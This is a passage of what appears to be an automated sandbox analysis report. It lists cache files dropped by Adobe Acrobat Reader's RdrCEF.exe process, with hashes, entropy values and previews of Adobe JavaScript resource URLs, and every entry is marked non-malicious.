                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):206
                                                                                                          Entropy (8bit):5.265340562885316
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maVYOFLvEWdwAPCQNH6tiaxm7OhKlvAXn:RbR16eaZxmJc
                                                                                                          MD5:033075C6B01492BE5332332F03EA4BBC
                                                                                                          SHA1:D88F7B955CCC5E0F2842F680C3B950BB27CA8C3E
                                                                                                          SHA-256:6681795D6396ECD5CD64369C5C414C42F62ADEDD916B8B62A6E639C44630BEF1
                                                                                                          SHA-512:E9C355F168BC810F24B4C0863653A1A8055B3345E74CF2E2B84DA21DF8DCC2D672B8FAC55682E59E2F4D7BBA6D6E071C7F8C4B3C52F7867DD7429E533F53D514
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ..A..Eo...................................*"J.........4T].....Tw.....(..b...EO....9.A..Eo......+c.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):5.231489172004397
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lx2gv8RzYOCGLvHkWBGKuKjXKX7KoQRA/KWEKPWFvGH5kt1llhzChv3dF5Yuf2:ms2gEYOFLvEWdGQRQVu0H6t6hPdFti
                                                                                                          MD5:AFC40694460F866A8EEF11B49951782D
                                                                                                          SHA1:5C97D8751643F806D30F8CF6A86C378BB03A96DF
                                                                                                          SHA-256:2AEE7AEFF2EA77785D4FB668290D79B02949A8DA08D37A54005E9BD91C7B1324
                                                                                                          SHA-512:AF3663F651FB2B18477870D02873FD95EC1CA2489B264009B8A7D9C6EB419BCDB654672932F1D1895E4A492929A751CD28356CF43170513840D6A6DC33153BB5
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..A..Eo...................................*"JN.......@..{o]...9o|..qY....T....{..u.b..A..Eo.................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):230
                                                                                                          Entropy (8bit):5.243213655126001
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:m+8nYOFLvEWIAuELZRudyPGVH6tAMtMe0KGkTqcYQJ:1StuEH2Za2g1J
                                                                                                          MD5:671228A2CD8BDE64A012A28425D0E2C9
                                                                                                          SHA1:4A854A6B387776929058101790690640FF496B90
                                                                                                          SHA-256:3121B3D429B04BA44012ED92F2CF5C4CDF64233E91FFBB995983CCA1A0A52CC8
                                                                                                          SHA-512:438BD0019440DA1A6A7513E062373670BF58EB84D97A263C3E191D6E03F2027744C9DE9CDDE6F8DFA180488A8C80B0006717AD76A3FF75E281774930E230E6A5
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......b.....6....._keyhttps://rna-resource.acrobat.com/static/js/libs/microsoftGraph/microsoft-graph-js-sdk-web.js ..A..Eo...................................*"J..............-.....5p9o..k#.}..6(..*A...A..Eo.......be.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.286920914204873
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maHYO6LvEwQlRmVxu0H6tNllcFSChn3c:ZOQKHu0azsSCh3c
                                                                                                          MD5:A8D6FA8185BF814A420459AF4FCF8509
                                                                                                          SHA1:89A5995A06D1852539AD92EEF7952AD7923755CF
                                                                                                          SHA-256:C9CE90764D148E079AA4568721BFB01566689279F67960DD52E91A6ACB412684
                                                                                                          SHA-512:78945B6C414F34608A1DD9CF7A2C8501BBC162245EF0AAADF726C5620B27E3B4D386EBCA0C4C5B27581D6CD3C795E3AEAD5065A5681F4929CD7ADA1117BBDF2F
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y....p8....._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/8368-chunk.js ..A..Eo...................................*"J........X.p...}M?p.^_...8pc....r2.....A..Eo.......".T........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):217
                                                                                                          Entropy (8bit):5.244680997084492
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+l3Umv8RzYOCGLvHkWBGKuKjXKIMcWQAPKfKPWFvGH5kt1llhvNWUR/xFzGogms:mgEYOFLvEWdpJWNKyu0H6t4UR/xXjDk
                                                                                                          MD5:3D9772B3BBB8464575FEB8A483BADE63
                                                                                                          SHA1:AA02687A598682B6ACB95175347DEF0D8F2FD8E7
                                                                                                          SHA-256:BEB3C09F1AE3E559ABF90D5819388C6D4A052A7A82E7BA1356C8E76278F455B8
                                                                                                          SHA-512:E02CF930AA2A7B0D18ED5256686283745E3EF172D9DA8424A9B3CD8D4B4456D57C10817787A9E6D035B2F0AF2248399956C6D2D9804D49159D2ACF061046F541
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......U...r.L....._keyhttps://rna-resource.acrobat.com/static/js/plugins/unified-share/js/selector.js ..A..Eo...................................*"J........U......&.Y|.. . .&.............A..Eo.......N.p........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):210
                                                                                                          Entropy (8bit):5.252903109562394
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuVGH5kt1llhBDxWREnNWQ1SUmmill:mzyEYOFLvEWdrIOQNH6tWREt1S/mi
                                                                                                          MD5:F625AEABAEFFF097B3479C01E419A97B
                                                                                                          SHA1:1A9657B928D939F0AC3FE1DF697A2137A07792F7
                                                                                                          SHA-256:E2FC748F1FC784B2A501F116134AC8199E5B94C744D3B6C577D0A1F40CFC43A5
                                                                                                          SHA-512:0D84C22002E201D60BD634C3CD3A9406FD4CE03FFFE2AB75E799AEC6BA55CA8B95D560C327A99C3ED88F4AD1397EF664B88EACC34F5378FF7F9A82421B2C6CBC
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ..A..Eo...................................*"J|........t\a......x5.'OuE.C..@......x..A..Eo......v.~.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.352627559495691
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maePYO6LvEwQlRmVmZtu0H6tNllc11tLh3c:IOQK4u0az+Jc
                                                                                                          MD5:BAD0FB847ED9DF0B2EBFB1641AE2A5AA
                                                                                                          SHA1:7D87FD0717AAB6EC430841653A0DCF3C8E9546D4
                                                                                                          SHA-256:D9E7DFD8F4AD7CD70F3AEF61C74AF71E81ABECDE29E4B963EE6F87461624E4A8
                                                                                                          SHA-512:9939CB48277D1D274C4AC5FBEA00E38245A1A9E6E341E9ED377AE08021B79C88793B727C32FAF79CEF63E30F6919B4DC11AC0156CB87E847C8538BFB1A3DD876
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y....a.G...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/2882-chunk.js ..A..Eo...................................*"J..........?M..v......df..xq..#.+g..wG....A..Eo.......".T........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.387403452740381
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lztbyv8RzYOjGLvHkwIBIXeRmBVtTDku0H5kt1llhM6FB0rhgpUmlitl:matbPYO6LvEwQlRmVtTDku0H6thLaIl
                                                                                                          MD5:0FB92D66AA57F90E17D585BF853FC314
                                                                                                          SHA1:97EE15950624694B6142B074B74F211B40BA622A
                                                                                                          SHA-256:36A79FB629750226AB9393BB7C1F17975FC855FCF7B65758737432ACF79741F6
                                                                                                          SHA-512:B8951EE4F3D0DB5D9DDA62394A576A6783CA5D88FE02393E1FE57260A71D36E0596F835244EE6B4939E91F71F4FF9C84C7AD81213940F212A9C0F3BF13C814CF
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y....x......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/7467-chunk.js ..A..Eo...................................*"J"........~....Q.^...*.O.N......g}......A..Eo.......duJ........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):222
                                                                                                          Entropy (8bit):5.220449937163241
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFvGH5kt1llh49DWlwJNqww6U+5m2lX:mnYOFLvEWdhwyu0H6tEIlwrqwK+42/
                                                                                                          MD5:6F9910E82F3FFAAA59B0078C7CEDF14C
                                                                                                          SHA1:C3A7249DC74674C2B7B9BEF9C6DF0781B4234FEA
                                                                                                          SHA-256:4460EC92C61F5AFA8BF829019448BE3676394AE7D4D30B9EC4E77A70CE08E5BE
                                                                                                          SHA-512:53FEF78DBDB2B5F0F2CEE1FDBD9711A8B18DCEFB0C0622350814596821913D8AFBEF86C52D118D2B01B3EC03CE8CB1EA5E1B1EE62CCFBB7265E73464452C5F4D
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ..A..Eo...................................*"J..............7...o..a=.98I......(3.$G.A..Eo.......v..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):234
                                                                                                          Entropy (8bit):5.248459830811706
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mYXYOFLvEWdrROk/RJbu0H6t6DzQfO44VU:/RrROk/JaID0fL
                                                                                                          MD5:99D2DFD59DA6DBCEE3FCC09261BD481B
                                                                                                          SHA1:9B38A5A5A33EBCED597EC560C9C4B6F7C10E4823
                                                                                                          SHA-256:76DA29E5F3F638196042FB82DA33C50B583CCE22CB978DB1C992A4094C8ACA13
                                                                                                          SHA-512:65B6EF12B0AE42D02D7F28CD2F96E76B8366CCAC3E008978599EB71B8DB2337E5E9DD6D62D5CB7EFB7FAEE2888592B4C574E19F09AC5E893FDD6D222A69C8AC5
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..A..Eo...................................*"J{.........~..rw.+[....!.)?..f.U..(=.=.A..Eo......o...........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):190
                                                                                                          Entropy (8bit):5.167474312757731
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVGH5kt1llhoHll+mzoIN1OFPL4mlot/:mmDEYOFLvEWXIGH6tUH/+mzV1QPLrl4
                                                                                                          MD5:4676BCC7B09EE252E0F22C78DEDA8A11
                                                                                                          SHA1:C8D403EDD588B88BC20E234E2A52ABB6807C8C5A
                                                                                                          SHA-256:57AD9EA4B76DA17AEB135B78E9227EA4BFEAB7F9AA53FE7B2C7FCC4BB98D29CF
                                                                                                          SHA-512:547ED070E9CFCAEC1A1926375997E07814CEF7E92A08BF6A56906EC3A963DFEC63B2128083A184CDE50751139CE7C2591CB414EACADBC65315B2377840DDD650
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..A..Eo...................................*"JU.........~]...%s..<...n.f..<.....1#..U..A..Eo........G)........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):211
                                                                                                          Entropy (8bit):5.252067939125602
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvGH5kt1llhoew8D6EsEJeUmxc/:m52YOFLvEWdMAu0H6tUvEvsEJ4xc
                                                                                                          MD5:D1E3D2D0E485E3A597E345BAFCC3623F
                                                                                                          SHA1:AF46E47D6CBBF353A6E369F060424C613424AEF5
                                                                                                          SHA-256:6140B447FB64B519D050CE81DC36010271A5F1D7195E94EACD18B7CFB8C3D205
                                                                                                          SHA-512:41CB1297503F2BFBD97AE4F1C8A20E1812D09370996E516CC0F1F29DCA7FFBC8075F6C246A68BA4A51B69DB37D8FE98C3CFB9D6B220B346F663598A27D8137BE
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ..A..Eo...................................*"JU.........z._a...'.v.......4p3..1.']...A..Eo........0.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):214
                                                                                                          Entropy (8bit):5.222002852747239
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mYilPYOFLvEWd8CAdAu0H6tWG/ORongjll:6lJR9akGWRoil
                                                                                                          MD5:F8C7531A4E3B84BDE105EBDA864D67B3
                                                                                                          SHA1:EEA2D6EED9B2B148FDB37FAE4D68397264BB84DF
                                                                                                          SHA-256:3DFC817B43F79578316F0FA8B88602E64FE431025EDF9E78DB663B73BDC708A5
                                                                                                          SHA-512:73E99871E63F91C5BDAB1DA002BC82BCC09FD2945719E21C320A5AF8753AE8CF875E588DFBCAB649C100BEBB837510578D227D1D21CC56CB36CFDF50A05AD730
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..A..Eo...................................*"JW.......c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227
                                                                                                          Entropy (8bit):5.235425691649553
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mY8nYOFLvEWdrROk/Iu0H6t4DpN16wGA:F8hRrROk/GaQd
                                                                                                          MD5:B5BE128D782B0C184BC2762C0A85E15B
                                                                                                          SHA1:338ECBB5DED916073A16AD3C874AD7C0FBE0CB9D
                                                                                                          SHA-256:FC5CC28CBCB3A3C0845AE760635FC7A7A871B1AB2273A5F51159914D51243DC9
                                                                                                          SHA-512:C62A8F15FF735CC7454930C092E4B8AEDE0D6BBDD1C4A5EE779647C555E5690D9FE4436ED7A170BD76EF8497B51CCF1A6AC1941185419B24EC66A0CCF9275A2D
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..A..Eo...................................*"Jy.........%.k.SZ..~W.....:)'B..ad......A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):217
                                                                                                          Entropy (8bit):5.292998729120734
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lstxt08RzYOCGLvHkWBGKuKjXKX+IAuAJVKjXKLuVGH5kt1llhEDZYPmJelc0q:mLrnYOFLvEWdrIoJUQNH6t4DCeJIiA
                                                                                                          MD5:CE818400F1BC8C6B46512817956D4599
                                                                                                          SHA1:5C76F508474C1A5BCC2F9AAD5CE7D3B09470807A
                                                                                                          SHA-256:897451F76E6C0EBB65A9964A524951E5890E3A1B411B0DF6E62FB309F5FBD089
                                                                                                          SHA-512:BD63DBF889F5E90D2C77EC2F3A7C2FED53AA368194B8CD987F7EBC9C80241E6601073177696A0627106BF579D7B099106786ED2058F20069BEF4DE9D4912BB38
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..A..Eo...................................*"Jy........;"./N_.,.:C..2....9L.H...3:...A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):212
                                                                                                          Entropy (8bit):5.206848060414262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvGH5kt1llhINl/6mgmOZLhT7UmX:mOEYOFLvEWdrIhu0H6t0Hzgm2d/L
                                                                                                          MD5:8C8927E581CACEC6D4580D5A3966B38D
                                                                                                          SHA1:5004B80E041253498BCDFED3E4D6980031801A98
                                                                                                          SHA-256:065557647BD5052E3A98B1D5D64B63244083D4BE5CC5C62B72415C3C6DBD6FB3
                                                                                                          SHA-512:9CB5C0CDE17E91AE81A2B412936CCEE6DB1255707EF2EB2FA5DE7756832F0604C8409806F2FE1E0A7A84B8B80205CBDACCF3E2465C6794687965255800CB895F
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ..A..Eo...................................*"Ju.......Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo......].1.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):192
                                                                                                          Entropy (8bit):5.210159265495962
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7CvGH5kt1llhjzP2BiaQ562HvpMmqXFx:mAElVYOFLvEW1KBH6trrx56uvpk
                                                                                                          MD5:D544B57B55D81F9503E1C0E718A57565
                                                                                                          SHA1:88C504507A755C9D32C6414638542CC1BF2D7047
                                                                                                          SHA-256:2F53DCE54F6505AAC04D22C9EB9FCA2A0366789993DF29C94254E76A5CA24CB0
                                                                                                          SHA-512:5DF333EAE37352319D932076D2B66AB0865E431CCCD3F9EEB7C234F19E58E92D2AB920DFF4BFFFB56E0668E598FC1A4370AA0A80F32DFFF23A07AE35A0026426
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ..A..Eo...................................*"J........z?...SwC...^..y.....V..7R-O.....A..Eo.................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):218
                                                                                                          Entropy (8bit):5.304548846395611
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mWYOFLvEWdBJvvu0H6thCUDLYtmOZnJ6:xRBJ9aXDcFZ
                                                                                                          MD5:4A5D811D5712A2ACC28C66A43E03994D
                                                                                                          SHA1:A058897830A31E02D164CF5E32FCE4996A37F475
                                                                                                          SHA-256:950E3FD6908D29869DE3691D6B2D6192E8519A5425B400380421FF1832986CD4
                                                                                                          SHA-512:E006A262E564EB199C89CA6EF2F98A0E290E2EBF470832C41BAF870DA6335CF0A5CE42633A52253997676306CBD07EEEF1A0ED347E67CF0D5B2514BCB6E19511
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..A..Eo...................................*"JP...........t.q..W.EZ....1...[.zC.7mD..A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):5.240484461238442
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvGH5kt1llhOBJlld/pSKGoy:msRPYOFLvEWIa7zp7VH6tyBrn8VPue
                                                                                                          MD5:4D1544DBB3F769AFB6752D92CFE0A077
                                                                                                          SHA1:F04B2495A1FB41D3EB5F2501A79394E00B818D22
                                                                                                          SHA-256:6E56E2414A5FFBE443FBF83C365B38F37BB73FFE7643A3A8AFE17C62C6465210
                                                                                                          SHA-512:DB3C26BFAB23C5211738CEB17E8CA3E8E0A09F661FD16B7B7C1748E6B678BC48EDE6B9444700236B9366403CB6CE668934F154DD88F9FE47151EEFB74C2240B9
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..A..Eo...................................*"Js..........L...Im.@.........E.nW...IP..A..Eo.................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):213
                                                                                                          Entropy (8bit):5.199237175667012
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maYt6EYOFLvEWd5Rf29QNH6t8ygmblfqu/PJ7l:sDRH4ea+y7skl
                                                                                                          MD5:648EE2EA90EC80EEC90A6D0A4387106B
                                                                                                          SHA1:10688E6256E21DC4737646294D8374355BA7BAD5
                                                                                                          SHA-256:787B085C9B1D4326C656DCA8DE7B007D9F2FF95056C97743B14936098B277452
                                                                                                          SHA-512:90476E47105AD035F95818993B588CD05FB3CD46B04E4C40CCFA82975144EDEA71D98F5B40D649DF5024D3CB3C3EB320E0F695FB9151C09B2D99BB4A6ED3B474
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Q....)il...._keyhttps://rna-resource.acrobat.com/static/js/plugins/oauthdialog/js/plugin.js ..A..Eo...................................*"J...........xc.6.#....K..1\p..%.!.....i.A..Eo.......I.2........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):192
                                                                                                          Entropy (8bit):5.152751484395376
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+l8sldA8RzYOjGLvHkwIEZArCvGH5kt1llhJ7Jt1fJNEB2bVqgKSk4K5mXzt:mQ9YO6LvEwhIH6tYMhKX4
                                                                                                          MD5:42E01E7E2DA6A9B2B81CBB90742B7D90
                                                                                                          SHA1:788BCE9D58209CECD3833C22575126EC02F8DD7E
                                                                                                          SHA-256:1823B4F008CBF94E779A00C4DBCA7F3FDED2A13579BF503848C51F915FE095CF
                                                                                                          SHA-512:16B49909D539AD4151B32ADFB3ED542445EFB3A39B652356DC0E2B554935C37BD2075115DA88D91C02328EFA3BA7B4F101889BD109C1231B610CEA963A050B52
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......<....}......_keyhttps://rna-v2-resource.acrobat.com/dc-app-launcher.js ..A..Eo...................................*"J........P.6,."Q..\...Nr.>.:x.30.../F.JG.A..Eo......,.,.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):212
                                                                                                          Entropy (8bit):5.260554243987719
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mQt6EYOFLvEWdccAHQNH6tYJwjBRCh/4:XRc9eaSqDi/
                                                                                                          MD5:31ED33A8AF2182B50DB4A1B0D554DB94
                                                                                                          SHA1:4F6C98452924A6337BBEF873FEBA6D794DD786E8
                                                                                                          SHA-256:1962DE60D767B43D05997703F03B6FF2EFC6085986947B0E30B0AD703ECEF4C8
                                                                                                          SHA-512:01BD082544A70D9FF68BA7D88C87B039DA027FE092361B38B5653B653DE1CAD518C06F91B6DC25CFF122BC5F5E01BB1AF5815933A8ABFE1D64C8C37723A335D1
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ..A..Eo...................................*"Jd.......PJm...0x.x..RD...BB!@5..<..]....A..Eo......\.W.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):5.226551687968145
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lxrl/08RzYOCGLvHkWBGKuKjXK+RNBzKBtKPWFvGH5kt1llh7Dhll/KAS4Z4x4:msrnYOFLvEWd5Rf2Au0H6tApKGeNpt5
                                                                                                          MD5:C419109CF4F05CA61DE3AD417EEB40A5
                                                                                                          SHA1:897874E13F3DDCCDF52D1EAD69153BD1E9AEFE88
                                                                                                          SHA-256:9338AC4D7B9DE6F7FE23D44A34AE1E8E8A790337171209FA7E927C5E836B3235
                                                                                                          SHA-512:EA9ED42B2F6FEF28C981D0B35C64860B5B79C3BB6482D35FDF5945B56FD39966BC9BADE64732C4C38FE476A333618F11CCD845EF0402C2F2DFEACD9980B35053
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......S....c......_keyhttps://rna-resource.acrobat.com/static/js/plugins/oauthdialog/js/selector.js ..A..Eo...................................*"J................v.:......NH..-.A.C.Et..A..Eo.......qH.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.339380022640438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:masIYO6LvEwQlRmVd5u0H6tvaFZJeTXIGb/Lf:oaOQK75u0a5YeTXIGbj
                                                                                                          MD5:160C18D79E237CC6C34DBD2A9B00B0ED
                                                                                                          SHA1:8E52FA3C68E868B503893962A15723FD46643EB2
                                                                                                          SHA-256:84689C4E9B783D3C40BB172B1EB8385B9E2F05B99EF36694F1081BBBDBA9DC6B
                                                                                                          SHA-512:40AA0CA935B2E3ACB09E6C460CA8C4F62A20636EDCD39AA38419DC5CF73E605AE1627518C6767B0E496B7FB76A5823737DCEDA00164AEF9416ED1F07789E9D48
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/3815-chunk.js ..A..Eo...................................*"J!.......M.a...x...U..4Oo.%k..;.C..m.F.FB.A..Eo.......c..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.361903579331332
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lzhgv8RzYOjGLvHkwIBIXeRmBVGUku0H5kt1llho/PkMb6d4144mfolllt:maWEYO6LvEwQlRmVGbu0H6tkb6dOYf4
                                                                                                          MD5:B19A52194859270D009F6F3D9DA875B6
                                                                                                          SHA1:DC95ACF20ADA06A93E22B9D6405A300115B4DCDA
                                                                                                          SHA-256:FCBD3FC59624237373D6CE4E294E264785D5FED0D14820FAEC96FC7116566B6A
                                                                                                          SHA-512:10DE39F4C004E338417018990D6AD5437DD03800056D9899B0B20D0922407A5D984B890538950296A55C67A9D46C8541FDBB9AB954A0AE4B26A67CDCC37CF867
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y....`......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/8950-chunk.js ..A..Eo...................................*"J*............0I. >....I...$\U;........A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):214
                                                                                                          Entropy (8bit):5.28033532863683
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maJYOFLvEWdfNBHvdQNH6tE//6PzPne7cV6grz1:v/RfTHleaa//IPneYU
                                                                                                          MD5:A82F3E284B9FDE8C6E94DBE35F54A649
                                                                                                          SHA1:7E29D8F26969DDD59997C67CE1115BAD16B6B709
                                                                                                          SHA-256:DF202EAD27E18256621A724CC24399B1707197067ABEDE5C4D7ACDEDB175D6BC
